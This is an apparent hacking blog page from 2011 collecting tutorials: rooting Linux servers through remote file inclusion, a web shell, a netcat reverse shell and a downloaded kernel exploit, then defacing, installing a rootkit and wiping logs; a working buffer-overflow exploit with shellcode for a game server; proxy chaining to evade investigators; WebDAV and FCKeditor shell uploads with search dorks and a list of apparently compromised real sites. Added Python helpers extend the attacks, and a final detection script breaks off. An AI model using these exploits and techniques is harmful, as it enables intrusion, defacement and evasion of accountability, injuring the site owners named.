Learn Full Metasploit (Free Ebook By Ownedsec)

Wednesday, 19 October 2011

Server Rooting

This is a tutorial on rooting Linux servers with the r57 shell (or any other web shell).
Too bad not many sites are vulnerable these days =/

Suppose that we have found a site with a Remote File Inclusion (R.F.I.) vulnerability:

http://www.hackedsite.com/folder/index.php?page=

We can run our shell through the Remote File Inclusion, as follows:

http://www.hackedsite.com/folder/index.p...shell.php?

where shell.php is our web shell, which we have already uploaded to
our own site (http://www.mysite.com).
Once we are in the shell, the first thing to note is the kernel version, shown
at the top of the page or obtained by typing uname -a in the command line.

Next we need a back-connection (a reverse shell) from the box to us. There are
two ways to do this if we have a suitable web shell:

We can use the Back-Connect module of the r57/c99 shell, or upload a separate
back-connector (a Perl or C connect-back shell) to a writable folder.

Most shells have a back-connect feature built in, so there is no need to upload
a separate Connect Back Shell. We will look at the first way, using the feature
inside the shell (in our example the shell is r57).

First we start NetCat listening on a specific port (if we are behind a router,
this port must be opened/forwarded on the NAT/firewall), as follows:

We will use port 11457 (the default port in recent versions of the r57 shell);
any other port works as well.

We press Windows Start -> Run -> and type: cmd
Then we go to the NetCat directory:

e.g.

cd C:\Program Files\Netcat

And we type the following command:

nc -n -l -v -p 11457

NetCat responds: listening on [any] 11457 ...

In the main page of the r57 shell, under the :: Net :: menu, we find
back-connect. In the IP field we type our public IP (check http://www.cmyip.com
if we have a dynamic address).

In the Port field we put the port that we opened and on which NetCat listens.

When we press connect the shell responds:

Now script try connect to <IP here> port 11457 ...

If our settings are correct, NetCat gives us a shell on the server.

Now we will continue to the rooting process.

We must find a writable folder where we can download and compile the local
root exploit that will give us root privileges on the box. Which exploits apply
depends on the version of the Linux kernel. Sometimes an exploit fails to run
because the box is patched, or because we do not have the necessary permissions
(for example, a writable folder such as /tmp that is mounted noexec, where a
compiled binary cannot be executed at all).

List of the exploits/kernel:

2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h00lyshit, prctl
2.6.14 -> raptor, raptor2, h00lyshit, prctl
2.6.15 -> raptor, raptor2, h00lyshit, prctl
2.6.16 -> raptor, raptor2, h00lyshit, prctl

We will see the case of 2.6.8 Linux kernel. We will need the h00lyshit exploit.

Some sites where we can find local root exploits:

http://www.milw0rm.com (try searching for "linux kernel")

Other sites: http://www.packetstormsecurity.org
or try Googling; you can find them.

We can list world-writable files and folders by typing:

find / -perm -2 -ls

(add -type d to show only directories). We can also use the /tmp folder, which is
a standard writable folder.

We type: cd /tmp

To download the local root exploit we can use a download command for linux like
wget.

For example:

wget http://www.site.com/shells/h00lyshit.c

where http://www.site.com/shells/h00lyshit.c is the url of h00lyshit.

After the download we must compile the exploit (read the instructions in the
exploit's header before compiling).

For the h00lyshit we must type:

gcc h00lyshit.c -o h00lyshit

Now we have created the executable file: h00lyshit.

The command to run this exploit is:

./h00lyshit <very big file on the disk>

We need a very big file on the disk in order for the exploit to run successfully and give us root.

We must create a big file in /tmp or in another writable folder.

The command is:

dd if=/dev/urandom of=largefile count=2M

where largefile is the filename. (With the default 512-byte block size, count=2M
gives a 1 GiB file filled from /dev/urandom.)

We must wait 2-3 minutes for the file to be created.

If this command fails (for example, if the dd on the box does not accept the M
suffix), we can try the following, which creates a 100 MiB file of zeros:

dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024

Now we can proceed to the last step. We run the exploit by typing:

./h00lyshit largefile or

./h00lyshit /tmp/largefile

(if we are in a different writable folder and largefile was created in /tmp)

If there are no runtime errors (otherwise the kernel is probably patched, or
something is wrong with the exploit or the large file), we will get root.

To check if we got root:

id or

whoami

If it says root we got root!
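As an added example (not part of the original tutorial), the following Python script performs the checks a practitioner wants before the wget/gcc/dd steps above: which directories the current user can actually write to (the tutorial's find -perm -2 only shows world-writable entries), and whether the chosen directory sits on a filesystem mounted noexec, where the compiled exploit cannot be executed no matter what it does. The /proc/mounts sample inside it is constructed; on a real box you would feed it the contents of /proc/mounts.

```python
"""Pre-flight checks before downloading and compiling a local root exploit.

Added example, not from the original tutorial. It answers two questions the
tutorial's `find / -perm -2 -ls` and `cd /tmp` steps leave open: which
directories can *this* user actually write to, and is that directory on a
filesystem mounted noexec (in which case ./h00lyshit fails with
"Permission denied" before the exploit even starts).
"""
import os
import shutil
import tempfile

# Constructed /proc/mounts sample (not captured from a real host): /tmp is
# mounted noexec, the root filesystem and the web root are not.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext3 rw,relatime,errors=remount-ro 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec,relatime 0 0
/dev/sda2 /var/www ext3 rw,relatime 0 0
"""


def parse_mounts(text):
    """Return {mountpoint: set(options)} from /proc/mounts-style text."""
    mounts = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        # /proc/mounts escapes spaces in mountpoints as \040.
        mounts[fields[1].replace("\\040", " ")] = set(fields[3].split(","))
    return mounts


def mount_for(path, mounts):
    """The longest mountpoint that is a prefix of path, i.e. the filesystem it lives on."""
    path = os.path.abspath(path)
    best = "/"
    for mp in mounts:
        if (path == mp or path.startswith(mp.rstrip("/") + "/")) and len(mp) > len(best):
            best = mp
    return best


def is_noexec(path, mounts):
    return "noexec" in mounts.get(mount_for(path, mounts), set())


def writable_dirs(root):
    """Directories under root that the current user can write to and enter.

    os.access() checks the real uid, which is what counts when the web shell
    runs as the web server user rather than as the file owner."""
    found = []
    for dirpath, dirnames, _ in os.walk(root):
        # Pseudo-filesystems are noise when walking "/".
        dirnames[:] = [d for d in dirnames if d not in ("proc", "sys", "dev")]
        if os.access(dirpath, os.W_OK | os.X_OK):
            found.append(dirpath)
    return found


def usable_dirs(root, mounts):
    """Writable directories that are not on a noexec mount: places to compile and run."""
    return [d for d in writable_dirs(root) if not is_noexec(d, mounts)]


def demo():
    """Exercise the checks offline on a constructed temp tree plus SAMPLE_MOUNTS."""
    mounts = parse_mounts(SAMPLE_MOUNTS)
    base = tempfile.mkdtemp()
    try:
        os.mkdir(os.path.join(base, "uploads"))
        os.mkdir(os.path.join(base, "readonly"))
        os.chmod(os.path.join(base, "readonly"), 0o555)
        writable = {os.path.relpath(d, base) for d in writable_dirs(base)}
    finally:
        os.chmod(os.path.join(base, "readonly"), 0o755)
        shutil.rmtree(base)
    return {
        "writable": writable,
        "tmp_noexec": is_noexec("/tmp/h00lyshit", mounts),
        "var_www_noexec": is_noexec("/var/www/uploads", mounts),
        "tmp_mount": mount_for("/tmp/largefile", mounts),
    }


if __name__ == "__main__":
    print(demo())
    # On the target itself:
    # print(usable_dirs("/", parse_mounts(open("/proc/mounts").read())))
```

If /tmp turns out to be noexec, a writable directory under the web root (often owned by the web server user) is the usual alternative; the same check tells you whether that one is any better.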

Now we can deface (or mass-deface) all the sites on the server, or set up a rootkit
(e.g. SSHDoor) and get ssh/telnet shell access to the server.

We must erase all logs with a log cleaner in order to stay safe. A good cleaner for
this job is the MIG Log Cleaner.

Sunday, 16 October 2011

Hack GTA San Andreas (SA-MP server)

# GTA SA-MP server.cfg Local Buffer Overflow Vulnerability (0day)
# Date: 9-26-11
# Author: Silent_Dream
# Software Link: http://team.sa-mp.com/files/samp03csvr_R2-2_win32.zip
# Tested on: XP SP3, Windows 7
# Thanks to: corelanc0d3r & team, Metasploit, Exploit-db.

# No POP/POP/RET (PPR) gadgets found (app compiled with SafeSEH on), so this exploit uses a direct EIP overwrite instead.
# 392 bytes max payload space (after this you hit SEH), 3 bad chars: 0x1a, 0x0d, 0x0a.

# Triggering details: overwrite server.cfg with this file, run samp-server.exe, boom calculator!

#!/usr/bin/perl
use strict;
use warnings;

my $file = "server.cfg";   # file must be named server.cfg for the bug to trigger.
my $head = "echo ";        # probably not needed, tweak if you want.
my $junk = "\x41" x 379;   # filler up to the saved return address
my $eip  = "\xaa\x9f\x42\x00";  # push esp / ret in samp-server.exe
my $nops = "\x90" x 12;
my $adjust = "\x81\xc4\x54\xf2\xff\xff";  # add esp, -3500: move esp below the payload so the decoder does not overwrite it

# x86/shikata_ga_nai succeeded with size 227 (iteration=1)
# Metasploit windows/exec calc.exe -b '\x1a\x0d\x0a'
my $shellcode =
"\xdb\xc3\xd9\x74\x24\xf4\xbe\xe8\x5a\x27\x13\x5f\x31\xc9" .
"\xb1\x33\x31\x77\x17\x83\xc7\x04\x03\x9f\x49\xc5\xe6\xa3" .
"\x86\x80\x09\x5b\x57\xf3\x80\xbe\x66\x21\xf6\xcb\xdb\xf5" .
"\x7c\x99\xd7\x7e\xd0\x09\x63\xf2\xfd\x3e\xc4\xb9\xdb\x71" .
"\xd5\x0f\xe4\xdd\x15\x11\x98\x1f\x4a\xf1\xa1\xd0\x9f\xf0" .
"\xe6\x0c\x6f\xa0\xbf\x5b\xc2\x55\xcb\x19\xdf\x54\x1b\x16" .
"\x5f\x2f\x1e\xe8\x14\x85\x21\x38\x84\x92\x6a\xa0\xae\xfd" .
"\x4a\xd1\x63\x1e\xb6\x98\x08\xd5\x4c\x1b\xd9\x27\xac\x2a" .
"\x25\xeb\x93\x83\xa8\xf5\xd4\x23\x53\x80\x2e\x50\xee\x93" .
"\xf4\x2b\x34\x11\xe9\x8b\xbf\x81\xc9\x2a\x13\x57\x99\x20" .
"\xd8\x13\xc5\x24\xdf\xf0\x7d\x50\x54\xf7\x51\xd1\x2e\xdc" .
"\x75\xba\xf5\x7d\x2f\x66\x5b\x81\x2f\xce\x04\x27\x3b\xfc" .
"\x51\x51\x66\x6a\xa7\xd3\x1c\xd3\xa7\xeb\x1e\x73\xc0\xda" .
"\x95\x1c\x97\xe2\x7f\x59\x67\xa9\x22\xcb\xe0\x74\xb7\x4e" .
"\x6d\x87\x6d\x8c\x88\x04\x84\x6c\x6f\x14\xed\x69\x2b\x92" .
"\x1d\x03\x24\x77\x22\xb0\x45\x52\x41\x57\xd6\x3e\xa8\xf2" .
"\x5e\xa4\xb4";

# Lexical filehandle in binary mode: a text-mode handle on Windows would turn
# any \n into \r\n, which are two of the three bad characters.
open(my $fh, '>', $file) or die "Cannot open $file: $!";
binmode($fh);
print $fh $head . $junk . $eip . $nops . $adjust . $shellcode;
close($fh);
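To see why the layout above works, here is the same server.cfg payload rebuilt in Python with the checks an exploit writer runs before trusting it: that the return address lands exactly at the stated offset, that everything after EIP fits in the 392 bytes before the SEH record, and that none of the three bad characters appear anywhere in the file. This is an added example, not part of the original exploit; the offsets, the bad characters and the return address 0x00429faa are taken from the exploit's own header and are assumed to be correct for that samp-server.exe build.

```python
"""Rebuild and sanity-check the server.cfg payload from the Perl exploit above.

Added example, not part of the original exploit. Offsets (379 bytes of filler,
392 bytes of room after EIP) and the three bad characters come from the exploit
header; the return address is the one the exploit uses and is assumed correct.
"""
import struct

BADCHARS = b"\x1a\x0d\x0a"
HEAD = b"echo "            # the exploit's optional prefix
JUNK_LEN = 379             # bytes of filler until the saved return address
RET_ADDR = 0x00429FAA      # push esp / ret in samp-server.exe (from the exploit)
MAX_AFTER_EIP = 392        # room before the SEH record gets overwritten
STACK_ADJUST = -3500       # add esp, -3500 keeps the decoder's stack writes off the payload

# Metasploit windows/exec calc.exe, shikata_ga_nai encoded, as given in the exploit
SHELLCODE = (
    b"\xdb\xc3\xd9\x74\x24\xf4\xbe\xe8\x5a\x27\x13\x5f\x31\xc9"
    b"\xb1\x33\x31\x77\x17\x83\xc7\x04\x03\x9f\x49\xc5\xe6\xa3"
    b"\x86\x80\x09\x5b\x57\xf3\x80\xbe\x66\x21\xf6\xcb\xdb\xf5"
    b"\x7c\x99\xd7\x7e\xd0\x09\x63\xf2\xfd\x3e\xc4\xb9\xdb\x71"
    b"\xd5\x0f\xe4\xdd\x15\x11\x98\x1f\x4a\xf1\xa1\xd0\x9f\xf0"
    b"\xe6\x0c\x6f\xa0\xbf\x5b\xc2\x55\xcb\x19\xdf\x54\x1b\x16"
    b"\x5f\x2f\x1e\xe8\x14\x85\x21\x38\x84\x92\x6a\xa0\xae\xfd"
    b"\x4a\xd1\x63\x1e\xb6\x98\x08\xd5\x4c\x1b\xd9\x27\xac\x2a"
    b"\x25\xeb\x93\x83\xa8\xf5\xd4\x23\x53\x80\x2e\x50\xee\x93"
    b"\xf4\x2b\x34\x11\xe9\x8b\xbf\x81\xc9\x2a\x13\x57\x99\x20"
    b"\xd8\x13\xc5\x24\xdf\xf0\x7d\x50\x54\xf7\x51\xd1\x2e\xdc"
    b"\x75\xba\xf5\x7d\x2f\x66\x5b\x81\x2f\xce\x04\x27\x3b\xfc"
    b"\x51\x51\x66\x6a\xa7\xd3\x1c\xd3\xa7\xeb\x1e\x73\xc0\xda"
    b"\x95\x1c\x97\xe2\x7f\x59\x67\xa9\x22\xcb\xe0\x74\xb7\x4e"
    b"\x6d\x87\x6d\x8c\x88\x04\x84\x6c\x6f\x14\xed\x69\x2b\x92"
    b"\x1d\x03\x24\x77\x22\xb0\x45\x52\x41\x57\xd6\x3e\xa8\xf2"
    b"\x5e\xa4\xb4"
)


def add_esp(delta):
    """Encode `add esp, imm32` (opcode 81 C4, little-endian signed immediate)."""
    return b"\x81\xc4" + struct.pack("<i", delta)


def find_badchars(blob, badchars=BADCHARS):
    """(offset, value) of every bad byte in blob; an empty list means it is clean."""
    return [(i, b) for i, b in enumerate(blob) if b in badchars]


def eip_offset(head=HEAD):
    """Offset of the return address inside the written file."""
    return len(head) + JUNK_LEN


def build_payload(head=HEAD, nop_count=12):
    """Assemble head | junk | EIP | nops | add esp | shellcode, refusing bad layouts."""
    junk = b"\x41" * JUNK_LEN
    eip = struct.pack("<I", RET_ADDR)
    after = b"\x90" * nop_count + add_esp(STACK_ADJUST) + SHELLCODE
    if len(after) > MAX_AFTER_EIP:
        raise ValueError(f"{len(after)} bytes after EIP, only {MAX_AFTER_EIP} available")
    bad = find_badchars(junk + eip + after)
    if bad:
        raise ValueError(f"bad characters at offsets {[i for i, _ in bad]}")
    return head + junk + eip + after


if __name__ == "__main__":
    payload = build_payload()
    with open("server.cfg", "wb") as f:   # binary mode: no \n -> \r\n translation
        f.write(payload)
    print(f"{len(payload)} bytes written, EIP at offset {eip_offset()}")
```

The bad-character scan is the step that matters most when re-generating the shellcode: any encoder run without -b '\x1a\x0d\x0a' will almost certainly produce a byte the config parser mangles, and build_payload() refuses to write the file rather than leaving you to debug a crash that never reaches EIP.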

Monday, 10 October 2011

How to chain multiple proxies

Introduction:
This is a tutorial on chaining proxies in order to become more anonymous while online. There aren’t enough tutorials online about this subject, so I decided to make an attempt at writing one. Since it’s on the subject, I included a section on chaining Wingates to become anonymous on telnet.
------------------------------------------------------------------------------------

I’m going to assume that most of you have already used a proxy before to hide your real IP address or domain, or maybe just used one to surf anonymously online. If you haven’t, well, hopefully you can keep up and possibly learn how to use a proxy. It’s also best if you know what an IP address or domain is before reading this tutorial. Hmm, I guess I have to show you where to find a proxy too. Well, I find that good, updated proxy websites are…

http://www.multiproxy.org/anon_list.htm
http://tools.rosinstrument.com/proxy/

It will be up to you to figure out which ones work or not. I’m not going to do all the work for you. You can check whether a proxy works by going to http://www.privacy.net to see if your IP address has changed.
------------------------------------------------------------------------------------

Proxy Servers
A proxy is a server that acts as a gateway between your computer and your destination (website, IRC chat, etc.). These proxies receive requests from users to view, for example, a web page. The proxy will then forward the request to the internet, find your requested page, then send the web page back to you, the user. Most proxies come with a cache (sounds like “cash”) feature that saves former websites that were visited on that proxy. Think of cache as a proxy’s storage room. Each site that you make the proxy visit, it saves in its own storage area (cache). So if the user or someone else requests the same site again later on, the proxy will go back into its cache, find the web page and send it back to the user. This saves time because the proxy doesn’t have to go search the Internet for the web page. It just pulls the site out of its cache.

The use of proxies to stay anonymous is a favorite thing to do among people on the Internet who are either paranoid or just security conscious. The anonymity factor comes from the proxy’s ability to hide your true Internet address. For example, if I were to run a scan on your computer right now, I would get the Internet address that was given to you by your ISP (internet service provider), but if I were to scan you while you were using a proxy, then I would get the Internet address of the proxy server. Basically the whole proxy picture looks like this…

[User]>>>>>[Proxy]>>>>>[Web Pages]

Simple enough, right? Right. So now let’s get to the chaining part.

Proxy Chaining
Proxy chaining is simply connecting to more than one proxy in sequence before reaching your intended destination. You can use as many proxy servers as you want. The more you chain, the harder you are to trace. Remember, no matter how many proxies you chain together, you will never be 100% anonymous. Let’s look at an example…

[User]>>>>>[Proxy1]>>>>>[Proxy2]>>>>>[Proxy3]>>>>>[Proxy4]>>>>>[Destination]

The example shows that to create a proxy chain, the user must first connect to Proxy1. From Proxy1, the user connects to Proxy2; from Proxy2 to Proxy3; from Proxy3 to Proxy4; and from Proxy4 to the intended destination (web page, Unix server, ftp server, etc.). All together we have 4 proxies in this example. Each proxy is a link in the chain. If the user were scanned while on the proxy chain in the example, the IP address or domain of Proxy4 would appear on the scan. Now the problem with proxies is that they tend to “die out” in a few weeks or less. It all depends. So if Proxy2 were to cease functioning, the chain wouldn’t work. You would need to get rid of Proxy2 and just use Proxy1, Proxy3, and Proxy4, or find another proxy to take Proxy2’s place. This is why proxy chaining can be a real pain if you are using it just to surf the net. If one dies, you have to figure out which one is not working, so you have to go through each one until you find the one that isn’t working.

Proxy chaining is a necessity if you plan on using proxies to execute a “hack”. If you are attempting to gain unauthorized remote access to any server, whether it is through telnet, ftp, or http, chaining is a must. As I said, you will never be 100% anonymous no matter what you do online, so it is possible that you can still be tracked even if you chain proxies. Chaining just makes it a lot harder to track someone. To make it even harder, it’s best to use foreign proxies, because if someone wanted to trace you, they would need to get logs of your use of each proxy from each proxy administrator. This could take quite a while, or never happen at all if one of the proxies, or all of them for that matter, belong to an admin in a country that isn’t too fond of the country you are located in. The longer it takes for the authorities to subpoena the logs of your usage of a single proxy from that proxy’s administrator, the more chance that the other proxies you used in the chain will have had their logs deleted by the time anyone gets to their administrators. So when attempting to do any kind of “hack”, it’s best to use at least five or six proxies in a chain.

HTTP Chaining
HTTP chaining is basically chaining proxy servers in your browser’s address bar. Example:

http://proxy.magusnet.com/-_-http://www.google.com

Notice how the above proxy and destination (google) are separated by (-_-). If you wanted to make a chain out of this you would simply add another proxy, e.g. http://proxy.server1.com/-_-http://proxy.server2.com/-_-http://www.destination.com

Another way to use proxies in your address bar is by adding the proxy IP or domain followed by the port number. Example…

http://anon.free.anonymizer.com:80/http://www.google.com

Notice how this time the proxy and destination server are separated by a forward slash (/) instead of dash, underscore, dash (-_-). To make a chain out of this you would again simply add another proxy, e.g. http://proxy1:80/http://proxy2:80/http://proxy3:80/http://www.yahoo.com

Both address-bar forms only work with web (CGI-style) proxies that take the target URL as part of the requested path; a plain HTTP proxy that you would configure in the browser settings does not understand them.

Browser Chaining
Browser chaining is fairly easy. I’ll use Internet Explorer as an example, since I believe it is the browser that most people have and use. First you need to find the Internet Options. You can do this either by finding the Explorer icon on the desktop, right-clicking it and choosing Properties, or, if you already have a browser window open, by going to Tools (sometimes View) and choosing Internet Options. Now that you have the Internet Options window up, go to the Connections tab, then click the first Settings button (not LAN Settings, the one above it). Now you should be in the Settings box. Put a check in the box that says Use a proxy server. If you wanted to surf using one proxy you would merely put the proxy in the Address: space and the proxy’s port number in the Port: space. To use a chain here you would put in a proxy followed by a “:” colon and the port number, then a space separating the next proxy, followed by a “:” colon and its port number, then a space, and so on. The last proxy you add should have its port number placed in the Port: space. If you did it right, it should look exactly like this…

Address: 213.234.124.23:80 121.172.148.23:80 143.134.54.67 Port: 80

***Notice that each proxy:port is separated by a space and that the last proxy has its port number placed in the Port: space. Do not check the box marked “Bypass proxy server for local addresses”. Press OK when you see that everything is in working order***

Wingates
A wingate is a proxy server that someone installs onto his/her computer which allows for a single or multiple online connection to take place through port 23, the default telnet port. Depending on their security, some wingates will allow anyone online to connect to them and usually stay “alive” or “working” anywhere from a few days to even months. There are people out there that scan for these Wingates and post the computer’s IP number or domain on their website to give anyone online a free list of them to use. You can also scan them yourself by using programs like WinScan.

Chaining Wingates Using Telnet
I’m going to assume you already know what telnet is, so I will get right down to it. To chain using telnet, you would first bring up the command prompt and type in “telnet” followed by your Wingate. (Since telnet’s default port is 23 and all Wingates run on port 23, the port number is not necessary, but I will add it to show you how a port number is typed out on screen.) Example…

C:\WINDOWS>telnet 61.133.119.130 23

So now you have “telnet”, a space, the wingate IP, a space, then the port number 23. Once you are connected to the wingate it should look like this…

Wingate>

Now you would type your next wingate and port number in, then press enter like so…

Wingate> 203.207.173.166 23

You can continue to do this until you connected to as many Wingates as you need. Once you are finished with your wingates you would connect to your destination. Example…

WinGate>arbornet.org

So now the entire picture would look something like this…

C:\Windows> telnet 61.133.119.130 23

Wingate>203.207.173.166 23

Wingate>135.245.18.167 23

Wingate>m-net.arbornet.org
Connecting to host arbornet.org...Connected

Welcome to the Once and Future M-Net
FreeBSD 4.3 (m-net.arbornet.org) (ttypv)

Enter newuser at the login prompt to create a new account
Enter upgrade at the login prompt to find out about increased access

login:
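The Wingate session above is hop-by-hop tunnelling: you ask each hop to open a connection to the next one, and only the last hop ever talks to the destination. The following Python is an added example (not part of the original tutorial) that applies the same idea to HTTP proxies supporting the CONNECT method, which is how tools such as proxychains build a chain today: one TCP connection to hop 1, then a CONNECT request for hop 2 sent through it, then a CONNECT for hop 3 sent through that tunnel, and so on. The FakeHop class and the proxy names are constructed so the chain runs offline; replace open_tcp with the default socket.create_connection to use it for real.

```python
"""Chain proxies hop by hop with HTTP CONNECT.

Added example, not from the original tutorial. Generalises the Wingate telnet
chain (connect to hop 1, ask it for hop 2, ask hop 2 for hop 3 ...) to HTTP
proxies that support CONNECT. Each hop sees only its neighbours; the
destination sees the last hop. Hop names below are constructed.
"""
import socket


class ProxyError(Exception):
    pass


def connect_request(host, port):
    """The CONNECT request sent through the current tunnel to reach the next hop."""
    return f"CONNECT {host}:{port} HTTP/1.1\r\nHost: {host}:{port}\r\n\r\n".encode()


def read_status(sock):
    """Read the response headers to a CONNECT and return the numeric status code."""
    buf = b""
    while b"\r\n\r\n" not in buf:
        chunk = sock.recv(4096)
        if not chunk:
            raise ProxyError("hop closed the connection before answering CONNECT")
        buf += chunk
        if len(buf) > 65536:
            raise ProxyError("oversized response headers")
    status_line = buf.split(b"\r\n", 1)[0]
    parts = status_line.split()
    if len(parts) < 2 or not parts[1].isdigit():
        raise ProxyError(f"malformed status line: {status_line!r}")
    return int(parts[1])


def chain_connect(hops, destination, open_tcp=socket.create_connection):
    """hops: [(host, port), ...]; destination: (host, port).

    Returns a socket tunnelled through every hop to destination. Only the first
    hop is contacted directly; every later hop is reached through the tunnel
    built so far, so a refusal by hop N means hop N-1 could not reach it."""
    if not hops:
        raise ValueError("need at least one hop")
    sock = open_tcp(hops[0])   # the only direct TCP connection we make
    for n, (host, port) in enumerate(list(hops[1:]) + [destination], start=1):
        sock.sendall(connect_request(host, port))
        status = read_status(sock)
        if status != 200:
            sock.close()
            raise ProxyError(f"hop {n} refused CONNECT to {host}:{port} with {status}")
    return sock


class FakeHop:
    """Constructed stand-in for the whole chain so the example runs offline:
    answers 200 to every CONNECT except for targets listed in `refuse`."""

    def __init__(self, refuse=()):
        self.refuse = set(refuse)
        self.sent = []
        self.closed = False
        self._pending = b""

    def sendall(self, data):
        self.sent.append(data)
        target = data.split(b" ", 2)[1].split(b":")[0].decode()
        code = b"403 Forbidden" if target in self.refuse else b"200 Connection established"
        self._pending += b"HTTP/1.1 " + code + b"\r\n\r\n"

    def recv(self, n):
        out, self._pending = self._pending[:n], self._pending[n:]
        return out

    def close(self):
        self.closed = True


def demo(refuse=()):
    """Run a four-hop chain against FakeHop; returns (CONNECT request lines, error)."""
    hop = FakeHop(refuse)
    hops = [("proxy1", 8080), ("proxy2", 3128), ("proxy3", 8080), ("proxy4", 1080)]
    try:
        chain_connect(hops, ("www.destination.com", 80), open_tcp=lambda addr: hop)
        error = None
    except ProxyError as e:
        error = str(e)
    return [s.split(b"\r\n")[0].decode() for s in hop.sent], error


if __name__ == "__main__":
    print(demo())
    print(demo(refuse=["proxy3"]))
```

The second demo() call shows the failure mode the tutorial describes: when a dead hop is in the middle of the chain, the error names the hop that refused, so you know which link to swap out instead of testing each proxy by hand.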

Sunday, 9 October 2011

Webdav Hacking & Defacing

Hi guys!
Today I will explain how to hack & deface WebDAV sites.
It's really easy, and this tutorial will show you clearly how to do it.
Let's start...

Open up the 'Map Network Drive'
- Windows XP : Right click on My Computer
- Windows 7 : Click the start bar



Now it will show a new little window.
Click on 'Sign up for online storage or connect to a network server'.



A new window will show up , click next.



Again click next.



Now here type in the server's IP or domain that has WebDav enabled.
Make sure to include http:// and the WebDAV directory, otherwise it may not work. Then click Next.



Now you'll get a login prompt. Log in with these credentials (the defaults set up by the XAMPP WebDAV install):

User name : wampp
Password : xampp

And click OK.



At the next window you can choose whatever name you want, but I prefer leaving the default; it's not important. Then click Next again.



Here is the last window , be sure to tick the checkbox 'Open this network place when I click Finish.'
And click Finish !



Now you'll get the prompt again; just log in with the same credentials I mentioned before.

And w00t! w00t!, we now have access to upload files. Just drag an ASPX or PHP shell (if the server accepts it), an index.html file, or simply a text file into the folder.
Then go to your browser and navigate to http://yourslave/webdav/shell.php (replace shell.php with your shell's name), and you'll have access to the server.




So that's it , hope you enjoyed and learned something useful from my tutorial.


NOTE: This isn't going to work on all WebDAV sites. Hopefully you understood the vulnerability: the server is still using the default login credentials that were set when WebDAV was installed.


written by :- -ThatGuy-.A

source devils cafe

WordPress FCKeditor Upload Vulnerability: Upload Your Deface Remotely


This method is also known as the OpenCart CMS (web shop) exploit. It's an old vulnerability, but many people don't know about it, so I'm publishing a tutorial here.

1- open Google.com and enter Dork:


  • inurl:admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
or
  • inurl:Powered By OpenCart
Google will give you a lot of websites; select any one. For example I got this one:
  • http://www.schoolshopper.com.au/
Then I simply add the vulnerable path after the website address.

Example
  • http://www.schoolshopper.com.au/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
(The path may differ on other websites, e.g. site.com/abc/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html)

Now a page like this will open:



Now see the Connector option at the top left of the page and change the connector to PHP (see the image below).

Now use the file upload option to upload your deface page or shell,
and to check the shell or deface page, open this URL:
  • www.site.com/deface.html
  • or
  • www.site.com/shell.php
I have uploaded xd.html here so you can check http://www.schoolshopper.com.au/xd.html

comment here if you have any problem in this tut 
Victoire
Some demo sites for practice (some may be patched by now; this is my old collection, so...)

  • http://ruthsgarden.com/jaihind.html
  • http://www.utahflowers.net/jaihind.html
  • http://www.eesnet.org/jaihind.html
  • http://bestonlinediscounts.net/
  • http://wenrestaurant.com/
  • http://ruthsgarden.com/
  • http://www.utahflowers.net/
  • http://www.inlove.my/
  • http://megamall.com.pk/
  • http://stefanyboutique.com/
  • http://www.virtualgeorge.info/
  • http://iphoneclone.biz/
  • http://amourcristallis.com/
  • http://www.eesnet.org/
  • http://www.schoolshopper.com.au/
  • http://www.mymaxi.nl/
  • http://wiretek.net/
  • http://shop.tjokgus.com/
  • http://www.aquariumsystem.it/
  • http://uae-shopper.com/
  • http://organicjewelries.com/
  • http://www.granmasantiques.com/
  • http://avocadogenie.com/
  • http://www.inputandanalysis.com
  • http://eddiegifts.com/
source: devil's cafe
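Both of the last two posts (WebDAV with default credentials, and the FCKeditor connector shipped inside the OpenCart admin tree) leave a clear trail in the web server's access log, which is where a defender or an incident responder would look for them. The following Python is an added example (not from either post): it parses Apache combined-format lines and flags a PUT of a server-side script that was later fetched (the WebDAV path), and probes of and uploads through the FCKeditor connector (the OpenCart path). The log lines are constructed; the connector.php path is the stock FCKeditor PHP connector, and the exact directory layout on a given install is an assumption.

```python
"""Detect WebDAV script uploads and FCKeditor connector uploads in access logs.

Added example, not from either post. SAMPLE_LOG is constructed. The
connector.php path is the stock FCKeditor PHP connector; the OpenCart layout
on a real install may differ.
"""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|asp|aspx|jsp|cgi|pl)$", re.I)
FCK_CONNECTOR = re.compile(r"/fckeditor/editor/filemanager/connectors/", re.I)

SAMPLE_LOG = """\
10.0.0.5 - - [09/Oct/2011:14:02:11 +0000] "OPTIONS /webdav/ HTTP/1.1" 401 0
10.0.0.5 - - [09/Oct/2011:14:02:12 +0000] "OPTIONS /webdav/ HTTP/1.1" 200 0
10.0.0.5 - - [09/Oct/2011:14:02:13 +0000] "PROPFIND /webdav/ HTTP/1.1" 207 981
10.0.0.5 - - [09/Oct/2011:14:02:20 +0000] "PUT /webdav/shell.php HTTP/1.1" 201 0
10.0.0.5 - - [09/Oct/2011:14:02:25 +0000] "GET /webdav/shell.php?cmd=id HTTP/1.1" 200 512
10.0.0.9 - - [09/Oct/2011:15:10:01 +0000] "GET /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html HTTP/1.1" 200 3201
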